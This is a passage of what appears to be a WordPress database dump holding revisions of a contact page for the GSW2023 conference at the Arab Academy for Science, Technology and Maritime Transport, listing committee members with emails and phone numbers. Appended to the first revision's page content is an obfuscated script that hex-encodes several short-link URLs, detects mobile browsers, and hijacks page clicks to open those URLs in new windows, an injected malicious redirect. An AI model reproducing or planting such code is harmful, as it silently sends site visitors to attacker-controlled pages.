src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Security Engineer</span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto: nagy@aast.edu\"> nagy@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201141606029\">+201141606029</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span><br />\nDirector of Events and conferences Department<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tr>\n<td>Email:</td>\n<td>yasserelrashidi@aast.edu</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201270059999</td>\n</tr>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span><br />\nLocal financial Director, GSW2023, Egypt<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tbody>\n<tr>\n<td>Email:</td>\n<td>mohamed_abdallah20102002@yahoo.com</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201141401861</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-29 20:14:45','2023-06-29 20:14:45','',4849,'https://gsw2023.com/?p=4967',0,'revision','',0),
(4968,4,'2023-06-30 12:44:47','2023-06-30 12:44:47','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>IT Support</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688129082714{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ayman_elzagh.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Research Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Web Director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\"><a href=\"mailto:ayzagh@aast.edu\">ayzagh@aast.edu</a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201210007979\">+201210007979</a></span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Security Engineer</span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto: nagy@aast.edu\"> nagy@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201141606029\">+201141606029</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span><br />\nDirector of Events and conferences Department<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tr>\n<td>Email:</td>\n<td>yasserelrashidi@aast.edu</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201270059999</td>\n</tr>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span><br />\nLocal financial Director, GSW2023, Egypt<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, 